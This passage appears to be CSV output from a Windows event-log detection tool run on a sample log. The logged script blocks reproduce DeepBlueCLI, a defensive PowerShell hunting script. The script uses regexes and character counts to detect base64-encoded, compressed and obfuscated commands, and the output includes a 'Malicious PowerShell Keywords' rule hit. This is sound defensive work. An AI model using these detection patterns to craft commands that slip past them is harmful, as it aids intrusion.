#$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.262 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter 
$file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. 
# This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.262 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.262 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.262 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.265 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" 
$_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. 
